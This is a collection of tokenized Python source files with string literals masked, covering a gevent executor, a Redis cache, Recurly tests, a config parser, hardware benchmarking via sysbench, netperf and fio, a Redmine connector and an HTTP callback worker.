<EOL> return option_set ( '<STR_LIT>' , root_modulename ) or option_set ( '<STR_LIT>' , '<STR_LIT:all>' ) </s>
<s> """<STR_LIT>""" <EOL> from concurrent import futures <EOL> from gevent . pool import Pool <EOL> import gevent <EOL> from . tasks import Task , MultiTask <EOL> class GeventPoolExecutor ( futures . Executor ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , max_workers ) : <EOL> self . max_workers = max_workers <EOL> self . _pool = Pool ( max_workers ) <EOL> def submit ( self , fn , * args , ** kwargs ) : <EOL> greenlet = self . _pool . spawn ( fn , * args , ** kwargs ) <EOL> return GeventFuture ( greenlet ) <EOL> def shutdown ( self , wait = True ) : <EOL> self . _pool . kill ( block = wait ) <EOL> class GeventFuture ( futures . Future ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , greenlet ) : <EOL> super ( GeventFuture , self ) . __init__ ( ) <EOL> self . _greenlet = greenlet <EOL> def result ( self , timeout = None ) : <EOL> try : <EOL> return self . _greenlet . get ( timeout = timeout ) <EOL> except gevent . Timeout as e : <EOL> raise futures . TimeoutError ( e ) <EOL> def exception ( self , timeout = None ) : <EOL> return self . _greenlet . exception <EOL> def running ( self ) : <EOL> return not self . done ( ) <EOL> def done ( self ) : <EOL> return self . _greenlet . ready ( ) <EOL> class GTask ( Task ) : <EOL> """<STR_LIT>""" <EOL> executor_class = GeventPoolExecutor <EOL> class MultiGTask ( MultiTask ) : <EOL> """<STR_LIT>""" <EOL> executor_class = GeventPoolExecutor <EOL> def wait ( self , executor , spawned_futures , timeout = None ) : <EOL> executor . _pool . join ( timeout ) <EOL> return all ( f . done ( ) for f in spawned_futures ) </s>
<s> """<STR_LIT>""" <EOL> from . base import BaseCache <EOL> from . storage . redisdict import RedisDict <EOL> class RedisCache ( BaseCache ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , namespace = '<STR_LIT>' , ** options ) : <EOL> """<STR_LIT>""" <EOL> super ( RedisCache , self ) . __init__ ( ** options ) <EOL> self . responses = RedisDict ( namespace , '<STR_LIT>' , <EOL> options . get ( '<STR_LIT>' ) ) <EOL> self . keys_map = RedisDict ( namespace , '<STR_LIT>' , self . responses . connection ) </s>
<s> import recurly <EOL> from recurly import Account , Transaction , ValidationError <EOL> from recurlytests import RecurlyTest <EOL> class RecurlyExceptionTests ( RecurlyTest ) : <EOL> def test_error_printable ( self ) : <EOL> """<STR_LIT>""" <EOL> str ( recurly . UnauthorizedError ( '<STR_LIT>' ) ) <EOL> def test_validationerror_printable ( self ) : <EOL> """<STR_LIT>""" <EOL> error = recurly . ValidationError . Suberror ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:message>' ) <EOL> suberrors = dict ( ) <EOL> suberrors [ '<STR_LIT>' ] = error <EOL> validation_error = recurly . ValidationError ( '<STR_LIT>' ) <EOL> validation_error . __dict__ [ '<STR_LIT>' ] = suberrors <EOL> str ( validation_error ) <EOL> def test_transaction_error_code_property ( self ) : <EOL> """<STR_LIT>""" <EOL> transaction = Transaction ( <EOL> amount_in_cents = <NUM_LIT:1000> , <EOL> currency = '<STR_LIT>' , <EOL> account = Account ( <EOL> account_code = '<STR_LIT>' <EOL> ) <EOL> ) <EOL> with self . mock_request ( '<STR_LIT>' ) : <EOL> try : <EOL> transaction . save ( ) <EOL> except ValidationError as e : <EOL> error = e <EOL> self . assertEqual ( error . transaction_error_code , '<STR_LIT>' ) </s>
<s> from __future__ import absolute_import <EOL> import os <EOL> import collections <EOL> import ConfigParser <EOL> NoDefault = object ( ) <EOL> SECTIONS = collections . OrderedDict ( ) <EOL> class attrdict ( dict ) : <EOL> "<STR_LIT>" <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> dict . __init__ ( self , * args , ** kwargs ) <EOL> self . __dict__ = self <EOL> class ConfigurationError ( Exception ) : <EOL> "<STR_LIT>" <EOL> def __init__ ( self , section , name , message ) : <EOL> self . section = section <EOL> self . name = name <EOL> self . message = message <EOL> def __str__ ( self ) : <EOL> return '<STR_LIT>' % ( self . section , <EOL> self . name , <EOL> self . message ) <EOL> def boolean ( input ) : <EOL> """<STR_LIT>""" <EOL> if input . lower ( ) in ( "<STR_LIT:true>" , "<STR_LIT>" ) : <EOL> return True <EOL> elif input . lower ( ) in ( "<STR_LIT:false>" , "<STR_LIT>" ) : <EOL> return False <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' % input ) <EOL> class Option ( object ) : <EOL> "<STR_LIT>" <EOL> def __init__ ( self , convert , default = NoDefault , validator = None ) : <EOL> self . convert = convert <EOL> self . default = default <EOL> self . validator = validator <EOL> def _make_extractor ( cls , prefix = "<STR_LIT>" , required = True ) : <EOL> section_name = cls . __name__ [ : - len ( "<STR_LIT>" ) ] . lower ( ) <EOL> if prefix : <EOL> section_name = prefix + "<STR_LIT::>" + section_name <EOL> def config_extractor ( parser ) : <EOL> section = attrdict ( ) <EOL> for name , option_def in vars ( cls ) . iteritems ( ) : <EOL> if not isinstance ( option_def , Option ) : <EOL> continue <EOL> try : <EOL> value = parser . get ( section_name , name ) <EOL> except ( ConfigParser . NoSectionError , ConfigParser . NoOptionError ) : <EOL> if option_def . default is NoDefault : <EOL> raise ConfigurationError ( section_name , name , <EOL> "<STR_LIT>" ) <EOL> value = option_def . default <EOL> else : <EOL> try : <EOL> value = option_def . convert ( value ) <EOL> except Exception , e : <EOL> raise ConfigurationError ( section_name , name , e ) <EOL> section [ name ] = value <EOL> return section <EOL> config_extractor . required = required <EOL> config_extractor . prefix = prefix <EOL> SECTIONS [ section_name ] = config_extractor <EOL> def config_section ( * args , ** kwargs ) : <EOL> if len ( args ) == <NUM_LIT:1> and not kwargs : <EOL> return _make_extractor ( args [ <NUM_LIT:0> ] ) <EOL> def config_decorator ( cls ) : <EOL> return _make_extractor ( cls , ** kwargs ) <EOL> return config_decorator <EOL> @ config_section <EOL> class SshConfig ( object ) : <EOL> user = Option ( str ) <EOL> key_filename = Option ( str , default = None ) <EOL> strict_host_key_checking = Option ( boolean , default = True ) <EOL> timeout = Option ( int , default = <NUM_LIT:30> ) <EOL> @ config_section <EOL> class DeployConfig ( object ) : <EOL> build_host = Option ( str ) <EOL> deploy_binary = Option ( str ) <EOL> build_binary = Option ( str ) <EOL> @ config_section <EOL> class PathsConfig ( object ) : <EOL> log_root = Option ( str ) <EOL> wordlist = Option ( str , default = "<STR_LIT>" ) <EOL> @ config_section <EOL> class SyslogConfig ( object ) : <EOL> def syslog_enum ( value ) : <EOL> import syslog <EOL> value = "<STR_LIT>" + value <EOL> return getattr ( syslog , value ) <EOL> ident = Option ( str , default = "<STR_LIT>" ) <EOL> facility = Option ( syslog_enum ) <EOL> priority = Option ( syslog_enum ) <EOL> @ config_section <EOL> class HostsConfig ( object ) : <EOL> def valid_host_source ( value ) : <EOL> try : <EOL> section = SECTIONS [ "<STR_LIT>" + value ] <EOL> except KeyError : <EOL> raise ValueError ( "<STR_LIT>" % value ) <EOL> section . required = True <EOL> return value <EOL> source = Option ( valid_host_source ) <EOL> @ config_section ( prefix = "<STR_LIT>" , required = False ) <EOL> class DnsConfig ( object ) : <EOL> domain = Option ( str ) <EOL> @ config_section ( prefix = "<STR_LIT>" , required = False ) <EOL> class MockConfig ( object ) : <EOL> host_count = Option ( int ) <EOL> @ config_section ( prefix = "<STR_LIT>" , required = False ) <EOL> class ZooKeeperConfig ( object ) : <EOL> connection_string = Option ( str ) <EOL> username = Option ( str ) <EOL> password = Option ( str ) <EOL> @ config_section <EOL> class DefaultsConfig ( object ) : <EOL> sleeptime = Option ( int , default = <NUM_LIT:0> ) <EOL> shuffle = Option ( boolean , default = False ) <EOL> def alias_parser ( parser ) : <EOL> aliases = { } <EOL> if parser . has_section ( "<STR_LIT>" ) : <EOL> for key , value in parser . items ( "<STR_LIT>" ) : <EOL> aliases [ key ] = [ glob . strip ( ) for glob in value . split ( '<STR_LIT:U+0020>' ) ] <EOL> return aliases <EOL> SECTIONS [ "<STR_LIT>" ] = alias_parser <EOL> def default_ref_parser ( parser ) : <EOL> default_refs = { } <EOL> if parser . has_section ( "<STR_LIT>" ) : <EOL> default_refs . update ( parser . items ( "<STR_LIT>" ) ) <EOL> return default_refs <EOL> SECTIONS [ "<STR_LIT>" ] = default_ref_parser <EOL> def parse_config ( ) : <EOL> """<STR_LIT>""" <EOL> parser = ConfigParser . RawConfigParser ( ) <EOL> parser . read ( [ "<STR_LIT>" , os . path . expanduser ( "<STR_LIT>" ) ] ) <EOL> config = attrdict ( ) <EOL> for name , section_parser in SECTIONS . iteritems ( ) : <EOL> is_required = getattr ( section_parser , "<STR_LIT>" , True ) <EOL> if is_required or parser . has_section ( name ) : <EOL> prefix = getattr ( section_parser , "<STR_LIT>" , None ) <EOL> parsed = section_parser ( parser ) <EOL> if not prefix : <EOL> config [ name ] = parsed <EOL> else : <EOL> unprefixed = name [ len ( prefix ) + <NUM_LIT:1> : ] <EOL> config . setdefault ( prefix , attrdict ( ) ) [ unprefixed ] = parsed <EOL> return config </s>
<s> from health_messages import Health_Message as HM <EOL> import health_protocol as HP <EOL> import ipaddr <EOL> import psutil <EOL> import sys <EOL> import subprocess <EOL> from hardware import matcher <EOL> import re <EOL> from commands import getstatusoutput as cmd <EOL> import threading <EOL> from sets import Set <EOL> import os <EOL> def is_in_network ( left , right ) : <EOL> '<STR_LIT>' <EOL> return ipaddr . IPv4Address ( left ) in ipaddr . IPv4Network ( right ) <EOL> def get_multiple_values ( hw , level1 , level2 , level3 ) : <EOL> result = [ ] <EOL> temp_level2 = level2 <EOL> for entry in hw : <EOL> if level2 == '<STR_LIT:*>' : <EOL> temp_level2 = entry [ <NUM_LIT:1> ] <EOL> if ( level1 == entry [ <NUM_LIT:0> ] and temp_level2 == entry [ <NUM_LIT:1> ] and level3 == entry [ <NUM_LIT:2> ] ) : <EOL> result . append ( entry [ <NUM_LIT:3> ] ) <EOL> return result <EOL> def get_value ( hw_ , level1 , level2 , level3 ) : <EOL> for entry in hw_ : <EOL> if ( level1 == entry [ <NUM_LIT:0> ] and level2 == entry [ <NUM_LIT:1> ] and level3 == entry [ <NUM_LIT:2> ] ) : <EOL> return entry [ <NUM_LIT:3> ] <EOL> return None <EOL> def fatal_error ( error ) : <EOL> '''<STR_LIT>''' <EOL> HP . logger . error ( '<STR_LIT>' % error ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> def run_sysbench_cpu ( hw_ , max_time , cpu_count , processor_num = - <NUM_LIT:1> ) : <EOL> '<STR_LIT>' <EOL> taskset = '<STR_LIT>' <EOL> if ( processor_num < <NUM_LIT:0> ) : <EOL> sys . stderr . write ( '<STR_LIT>' <EOL> '<STR_LIT>' % ( max_time , cpu_count ) ) <EOL> else : <EOL> sys . stderr . write ( '<STR_LIT>' % <EOL> ( processor_num , max_time , cpu_count ) ) <EOL> taskset = '<STR_LIT>' % hex ( <NUM_LIT:1> << processor_num ) <EOL> cmds = '<STR_LIT>' '<STR_LIT>' % ( taskset , max_time , cpu_count ) <EOL> sysbench_cmd = subprocess . Popen ( cmds , shell = True , stdout = subprocess . PIPE ) <EOL> for line in sysbench_cmd . stdout : <EOL> if "<STR_LIT>" in line . decode ( ) : <EOL> title , perf = line . decode ( ) . rstrip ( '<STR_LIT:\n>' ) . replace ( '<STR_LIT:U+0020>' , '<STR_LIT>' ) . split ( '<STR_LIT::>' ) <EOL> if processor_num == - <NUM_LIT:1> : <EOL> hw_ . append ( ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> str ( int ( perf ) / max_time ) ) ) <EOL> else : <EOL> hw_ . append ( ( '<STR_LIT>' , '<STR_LIT>' % processor_num , <EOL> '<STR_LIT>' , str ( int ( perf ) / max_time ) ) ) <EOL> def get_available_memory ( ) : <EOL> try : <EOL> return psutil . virtual_memory ( ) . total <EOL> except Exception : <EOL> return psutil . avail_phymem ( ) <EOL> def check_mem_size ( block_size , cpu_count ) : <EOL> dsplit = re . compile ( r'<STR_LIT>' ) <EOL> ssplit = re . compile ( r'<STR_LIT>' ) <EOL> unit = ssplit . findall ( block_size ) <EOL> unit_in_bytes = <NUM_LIT:1> <EOL> if unit [ <NUM_LIT:0> ] == '<STR_LIT>' : <EOL> unit_in_bytes = <NUM_LIT> <EOL> elif unit [ <NUM_LIT:0> ] == '<STR_LIT:M>' : <EOL> unit_in_bytes = <NUM_LIT> * <NUM_LIT> <EOL> elif unit [ <NUM_LIT:0> ] == '<STR_LIT>' : <EOL> unit_in_bytes = <NUM_LIT> * <NUM_LIT> * <NUM_LIT> <EOL> size_in_bytes = unit_in_bytes * int ( dsplit . findall ( block_size ) [ <NUM_LIT:0> ] ) * cpu_count <EOL> if ( size_in_bytes > get_available_memory ( ) ) : <EOL> return False <EOL> return True <EOL> def stop_netservers ( message ) : <EOL> sys . stderr . write ( '<STR_LIT>' ) <EOL> status , output = cmd ( '<STR_LIT>' ) <EOL> def start_bench_server ( message , port_number ) : <EOL> sys . stderr . write ( '<STR_LIT>' % ( message . my_peer_name , port_number ) ) <EOL> status , output = cmd ( '<STR_LIT>' % port_number ) <EOL> def get_my_ip_port ( message ) : <EOL> return get_ip_port ( message , message . my_peer_name ) <EOL> def get_ip_port ( message , ip ) : <EOL> port_number = <NUM_LIT:0> <EOL> for host in message . peer_servers : <EOL> if host [ <NUM_LIT:1> ] == ip : <EOL> port_number = message . ports_list [ host [ <NUM_LIT:0> ] ] <EOL> break <EOL> return port_number <EOL> def start_netservers ( message ) : <EOL> threads = { } <EOL> sys . stderr . write ( '<STR_LIT>' % ( len ( message . peer_servers ) - <NUM_LIT:1> ) ) <EOL> for server in message . peer_servers : <EOL> if message . my_peer_name != server [ <NUM_LIT:1> ] : <EOL> port_number = get_ip_port ( message , server [ <NUM_LIT:1> ] ) <EOL> sys . stderr . write ( "<STR_LIT>" % ( message . my_peer_name , port_number , server [ <NUM_LIT:1> ] ) ) <EOL> threads [ port_number ] = threading . Thread ( target = start_bench_server , args = tuple ( [ message , port_number ] ) ) <EOL> threads [ port_number ] . start ( ) <EOL> def add_netperf_suboption ( sub_options , value ) : <EOL> if len ( sub_options ) == <NUM_LIT:0> : <EOL> sub_options = "<STR_LIT>" <EOL> return "<STR_LIT>" % ( sub_options , value ) <EOL> def start_bench_client ( ip , port , message ) : <EOL> netperf_mode = "<STR_LIT>" <EOL> unit = "<STR_LIT>" <EOL> sub_options = "<STR_LIT>" <EOL> if message . network_test == HM . BANDWIDTH : <EOL> netperf_mode = "<STR_LIT>" <EOL> unit = "<STR_LIT>" <EOL> if message . block_size != "<STR_LIT:0>" : <EOL> sub_options = add_netperf_suboption ( sub_options , "<STR_LIT>" % ( message . block_size , message . block_size ) ) <EOL> if message . network_connection == HM . UDP : <EOL> netperf_mode = "<STR_LIT>" <EOL> elif message . network_test == HM . LATENCY : <EOL> netperf_mode = "<STR_LIT>" <EOL> if message . network_connection == HM . UDP : <EOL> netperf_mode = "<STR_LIT>" <EOL> sys . stderr . write ( "<STR_LIT>" % ( netperf_mode , message . my_peer_name , ip , port ) ) <EOL> cmd_netperf = subprocess . Popen ( <EOL> '<STR_LIT>' % ( message . running_time , ip , port , netperf_mode , unit , sub_options ) , <EOL> shell = True , stdout = subprocess . PIPE ) <EOL> return_code = cmd_netperf . wait ( ) <EOL> if return_code == <NUM_LIT:0> : <EOL> for line in cmd_netperf . stdout : <EOL> stop = Set ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> current = Set ( line . split ( ) ) <EOL> if current . intersection ( stop ) : <EOL> continue <EOL> elif ( len ( line . split ( ) ) < <NUM_LIT:4> ) : <EOL> continue <EOL> else : <EOL> if message . network_test == HM . BANDWIDTH : <EOL> message . hw . append ( ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' % ( ip , port ) , str ( line . split ( ) [ <NUM_LIT:4> ] ) ) ) <EOL> elif message . network_test == HM . LATENCY : <EOL> message . hw . append ( ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' % ( ip , port ) , str ( line . split ( ) [ <NUM_LIT:5> ] ) ) ) <EOL> else : <EOL> sys . stderr . write ( "<STR_LIT>" % cmd_netperf . returncode ) <EOL> for line in cmd_netperf . stdout : <EOL> sys . stderr . write ( line ) <EOL> def run_network_bench ( message ) : <EOL> run_netperf ( message ) <EOL> def run_netperf ( message ) : <EOL> threads = { } <EOL> nb = <NUM_LIT:0> <EOL> sys . stderr . write ( '<STR_LIT>' % ( message . network_test , message . block_size , message . running_time ) ) <EOL> for server in message . peer_servers : <EOL> if message . my_peer_name == server [ <NUM_LIT:1> ] : <EOL> continue <EOL> threads [ nb ] = threading . Thread ( target = start_bench_client , args = [ server [ <NUM_LIT:1> ] , get_my_ip_port ( message ) , message ] ) <EOL> threads [ nb ] . start ( ) <EOL> nb += <NUM_LIT:1> <EOL> sys . stderr . write ( '<STR_LIT>' % nb ) <EOL> for i in range ( nb ) : <EOL> threads [ i ] . join ( ) <EOL> def run_sysbench_memory ( message ) : <EOL> if message . mode == HM . FORKED : <EOL> run_sysbench_memory_forked ( message . hw , message . running_time , message . block_size , message . cpu_instances ) <EOL> else : <EOL> run_sysbench_memory_threaded ( message . hw , message . running_time , message . block_size , message . cpu_instances ) <EOL> def run_sysbench_memory_threaded ( hw_ , max_time , block_size , cpu_count , processor_num = - <NUM_LIT:1> ) : <EOL> '<STR_LIT>' <EOL> check_mem = check_mem_size ( block_size , cpu_count ) <EOL> taskset = '<STR_LIT>' <EOL> if ( processor_num < <NUM_LIT:0> ) : <EOL> if check_mem is False : <EOL> msg = ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> sys . stderr . write ( msg % block_size ) <EOL> return <EOL> sys . stderr . write ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> % ( block_size , max_time , cpu_count ) ) <EOL> else : <EOL> if check_mem is False : <EOL> msg = ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> sys . stderr . write ( msg % ( block_size , processor_num ) ) <EOL> return <EOL> sys . stderr . write ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> % ( block_size , processor_num , max_time , cpu_count ) ) <EOL> taskset = '<STR_LIT>' % hex ( <NUM_LIT:1> << processor_num ) <EOL> _cmd = '<STR_LIT>' '<STR_LIT>' <EOL> sysbench_cmd = subprocess . Popen ( _cmd % ( taskset , max_time , <EOL> cpu_count , block_size ) , <EOL> shell = True , stdout = subprocess . PIPE ) <EOL> for line in sysbench_cmd . stdout : <EOL> if "<STR_LIT>" in line : <EOL> title , right = line . rstrip ( '<STR_LIT:\n>' ) . replace ( '<STR_LIT:U+0020>' , '<STR_LIT>' ) . split ( '<STR_LIT:(>' ) <EOL> perf , useless = right . split ( '<STR_LIT:.>' ) <EOL> if processor_num == - <NUM_LIT:1> : <EOL> hw_ . append ( ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' <EOL> % block_size , perf ) ) <EOL> else : <EOL> hw_ . append ( ( '<STR_LIT>' , '<STR_LIT>' % processor_num , '<STR_LIT>' <EOL> % block_size , perf ) ) <EOL> def run_sysbench_memory_forked ( hw_ , max_time , block_size , cpu_count ) : <EOL> '<STR_LIT>' <EOL> if check_mem_size ( block_size , cpu_count ) is False : <EOL> cmd = '<STR_LIT>' '<STR_LIT>' <EOL> sys . stderr . write ( cmd % ( block_size , cpu_count ) ) <EOL> return <EOL> sys . stderr . write ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> % ( block_size , max_time , cpu_count ) ) <EOL> sysbench_cmd = '<STR_LIT:(>' <EOL> for cpu in range ( cpu_count ) : <EOL> _cmd = '<STR_LIT>' '<STR_LIT>' <EOL> sysbench_cmd += _cmd % ( max_time , block_size ) <EOL> sysbench_cmd . rstrip ( '<STR_LIT:&>' ) <EOL> sysbench_cmd += '<STR_LIT:)>' <EOL> global_perf = <NUM_LIT:0> <EOL> process = subprocess . Popen ( <EOL> sysbench_cmd , shell = True , stdout = subprocess . PIPE ) <EOL> for line in process . stdout : <EOL> if "<STR_LIT>" in line : <EOL> title , right = line . rstrip ( '<STR_LIT:\n>' ) . replace ( '<STR_LIT:U+0020>' , '<STR_LIT>' ) . split ( '<STR_LIT:(>' ) <EOL> perf , useless = right . split ( '<STR_LIT:.>' ) <EOL> global_perf += int ( perf ) <EOL> hw_ . append ( ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' % <EOL> ( block_size ) , str ( global_perf ) ) ) <EOL> def generate_filename_and_macs ( items ) : <EOL> '''<STR_LIT>''' <EOL> hw_items = list ( items ) <EOL> sysvars = { } <EOL> sysvars [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> matcher . match_spec ( ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:name>' , '<STR_LIT>' ) , <EOL> hw_items , sysvars ) <EOL> if '<STR_LIT>' in sysvars : <EOL> sysvars [ '<STR_LIT>' ] = re . sub ( r'<STR_LIT>' , '<STR_LIT>' , sysvars [ '<STR_LIT>' ] ) + '<STR_LIT:->' <EOL> matcher . match_spec ( ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> hw_items , sysvars ) <EOL> if '<STR_LIT>' in sysvars : <EOL> sysvars [ '<STR_LIT>' ] += re . sub ( r'<STR_LIT>' , '<STR_LIT>' , sysvars [ '<STR_LIT>' ] ) + '<STR_LIT:->' <EOL> matcher . match_spec ( ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> hw_items , sysvars ) <EOL> if '<STR_LIT>' in sysvars : <EOL> sysvars [ '<STR_LIT>' ] += re . sub ( r'<STR_LIT>' , '<STR_LIT>' , sysvars [ '<STR_LIT>' ] ) + '<STR_LIT:->' <EOL> if matcher . match_multiple ( hw_items , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> sysvars ) : <EOL> sysvars [ '<STR_LIT>' ] += sysvars [ '<STR_LIT>' ] [ <NUM_LIT:0> ] . replace ( '<STR_LIT::>' , '<STR_LIT:->' ) <EOL> else : <EOL> HP . logger . error ( '<STR_LIT>' ) <EOL> return sysvars <EOL> def check_mce_status ( hw_ ) : <EOL> if os . path . isfile ( '<STR_LIT>' ) and os . stat ( '<STR_LIT>' ) . st_size > <NUM_LIT:0> : <EOL> hw_ . append ( ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:True>' ) ) <EOL> else : <EOL> hw_ . append ( ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:False>' ) ) <EOL> def run_fio_job ( message ) : <EOL> mode = message . access <EOL> if message . mode == HM . RANDOM : <EOL> mode = "<STR_LIT>" % mode <EOL> run_fio ( message . hw , message . device . split ( ) , mode , message . block_size , message . running_time - message . rampup_time , message . rampup_time ) <EOL> def run_fio ( hw_ , disks_list , mode , io_size , time , rampup_time ) : <EOL> filelist = [ f for f in os . listdir ( "<STR_LIT:.>" ) if f . endswith ( "<STR_LIT>" ) ] <EOL> for myfile in filelist : <EOL> os . remove ( myfile ) <EOL> fio = "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" % ( rampup_time , time , io_size , mode ) <EOL> global_disk_list = '<STR_LIT>' <EOL> for disk in disks_list : <EOL> if '<STR_LIT>' not in disk : <EOL> disk = '<STR_LIT>' % disk <EOL> os . system ( "<STR_LIT>" % disk ) <EOL> short_disk = disk . replace ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> fio = "<STR_LIT>" % ( fio , short_disk , disk ) <EOL> global_disk_list += '<STR_LIT>' % short_disk <EOL> global_disk_list = global_disk_list . rstrip ( '<STR_LIT:U+002C>' ) <EOL> sys . stderr . write ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % <EOL> ( global_disk_list , time , mode , io_size ) ) <EOL> fio_cmd = subprocess . Popen ( fio , <EOL> shell = True , stdout = subprocess . PIPE ) <EOL> current_disk = '<STR_LIT>' <EOL> for line in fio_cmd . stdout : <EOL> if ( '<STR_LIT>' in line ) and ( '<STR_LIT>' in line ) : <EOL> current_disk = re . search ( '<STR_LIT>' , line ) . group ( <NUM_LIT:1> ) <EOL> continue <EOL> if ( "<STR_LIT>" in line ) or ( "<STR_LIT>" in line ) : <EOL> if ( len ( disks_list ) > <NUM_LIT:1> ) : <EOL> mode_str = "<STR_LIT>" % ( mode , io_size ) <EOL> else : <EOL> mode_str = "<STR_LIT>" % ( mode , io_size ) <EOL> try : <EOL> perf = re . search ( '<STR_LIT>' , line ) . group ( <NUM_LIT:1> ) <EOL> except Exception : <EOL> sys . stderr . write ( '<STR_LIT>' <EOL> '<STR_LIT>' % line ) <EOL> else : <EOL> multiply = <NUM_LIT:1> <EOL> divide = <NUM_LIT:1> <EOL> if "<STR_LIT>" in perf : <EOL> multiply = <NUM_LIT> <EOL> elif "<STR_LIT>" in perf : <EOL> multiply = <NUM_LIT:1> <EOL> elif "<STR_LIT>" in perf : <EOL> divide = <NUM_LIT> <EOL> try : <EOL> iperf = perf . replace ( <EOL> '<STR_LIT>' , '<STR_LIT>' ) . replace ( '<STR_LIT>' , '<STR_LIT>' ) . replace ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> except Exception : <EOL> True <EOL> hw_ . append ( ( '<STR_LIT>' , current_disk , mode_str + '<STR_LIT>' , <EOL> str ( int ( float ( float ( iperf ) * multiply / divide ) ) ) ) ) <EOL> try : <EOL> hw_ . append ( ( '<STR_LIT>' , current_disk , mode_str + '<STR_LIT>' , <EOL> re . search ( '<STR_LIT>' , line ) . group ( <NUM_LIT:1> ) . strip ( '<STR_LIT:U+0020>' ) ) ) <EOL> except Exception : <EOL> sys . stderr . write ( '<STR_LIT>' <EOL> '<STR_LIT>' % line ) </s>
<s> """<STR_LIT>""" <EOL> from werkzeug . routing import Map , Rule <EOL> urlmap = Map ( [ <EOL> Rule ( '<STR_LIT>' , endpoint = '<STR_LIT>' ) , <EOL> Rule ( '<STR_LIT>' , endpoint = '<STR_LIT>' ) , <EOL> Rule ( '<STR_LIT>' , endpoint = '<STR_LIT>' ) , <EOL> Rule ( '<STR_LIT>' , endpoint = '<STR_LIT>' ) , <EOL> Rule ( '<STR_LIT>' , endpoint = '<STR_LIT>' ) , <EOL> Rule ( '<STR_LIT>' , endpoint = '<STR_LIT>' ) , <EOL> Rule ( '<STR_LIT>' , endpoint = '<STR_LIT>' ) , <EOL> Rule ( '<STR_LIT>' , endpoint = '<STR_LIT>' ) , <EOL> Rule ( '<STR_LIT>' , endpoint = '<STR_LIT>' ) , <EOL> Rule ( '<STR_LIT>' , endpoint = '<STR_LIT>' ) , <EOL> Rule ( '<STR_LIT>' , endpoint = '<STR_LIT>' ) , <EOL> Rule ( '<STR_LIT>' , endpoint = '<STR_LIT>' ) , <EOL> Rule ( '<STR_LIT>' , endpoint = '<STR_LIT>' ) , <EOL> Rule ( '<STR_LIT>' , endpoint = '<STR_LIT>' ) , <EOL> Rule ( '<STR_LIT>' , endpoint = '<STR_LIT>' ) , <EOL> Rule ( '<STR_LIT>' , endpoint = '<STR_LIT>' ) , <EOL> ] ) </s>
<s> from redmine import Redmine <EOL> class BaseRedmine ( object ) : <EOL> def __init__ ( self , username = None , password = None , <EOL> apikey = None , id = None , url = None , name = None ) : <EOL> super ( BaseRedmine , self ) . __init__ ( ) <EOL> self . username = username <EOL> self . password = password <EOL> self . apikey = apikey <EOL> self . id = id <EOL> self . url = url <EOL> self . name = name <EOL> self . _create_connector ( ) <EOL> def _create_connector ( self ) : <EOL> if self . apikey : <EOL> self . redmine = Redmine ( self . url , key = self . apikey , <EOL> requests = { '<STR_LIT>' : False } ) <EOL> else : <EOL> self . redmine = Redmine ( self . url , username = self . username , <EOL> password = self . password , <EOL> requests = { '<STR_LIT>' : False } ) <EOL> class BaseIssueImporter ( object ) : <EOL> def __init__ ( self ) : <EOL> super ( BaseIssueImporter , self ) . __init__ ( ) <EOL> def fetch_trackers ( self ) : <EOL> raise NotImplementedError <EOL> def fetch_wiki ( self ) : <EOL> raise NotImplementedError <EOL> def fetch_issue_statuses ( self ) : <EOL> raise NotImplementedError <EOL> def fetch_users ( self ) : <EOL> raise NotImplementedError <EOL> def fetch_versions ( self ) : <EOL> raise NotImplementedError <EOL> def fetch_issues ( self ) : <EOL> raise NotImplementedError </s>
<s> from MockOS import MockOS as delegate_class </s>
<s> import threading <EOL> import time <EOL> import logging <EOL> import httplib2 <EOL> import json <EOL> import re <EOL> import base64 <EOL> class CallbackWorker ( ) : <EOL> def __init__ ( self , callback_url ) : <EOL> self . log = logging . getLogger ( '<STR_LIT>' % ( __name__ , self . __class__ . __name__ ) ) <EOL> self . callback_queue = [ ] <EOL> self . queue_lock = threading . BoundedSemaphore ( ) <EOL> self . queue_not_empty = threading . Event ( ) <EOL> self . httplib = httplib2 . Http ( ) <EOL> url_regex = r"<STR_LIT>" <EOL> sr = re . search ( url_regex , callback_url ) <EOL> if sr : <EOL> self . callback_url = sr . group ( <NUM_LIT:1> ) + sr . group ( <NUM_LIT:6> ) <EOL> auth = base64 . encodestring ( sr . group ( <NUM_LIT:2> ) + '<STR_LIT::>' + sr . group ( <NUM_LIT:4> ) ) <EOL> self . headers = { '<STR_LIT>' : '<STR_LIT:application/json>' , '<STR_LIT>' : '<STR_LIT>' + auth } <EOL> else : <EOL> self . callback_url = callback_url <EOL> self . headers = { '<STR_LIT>' : '<STR_LIT:application/json>' } <EOL> self . shutdown = False <EOL> def start ( self ) : <EOL> self . thread = threading . Thread ( target = self ) <EOL> self . thread . start ( ) <EOL> return self . thread <EOL> def shut_down ( self , blocking = False ) : 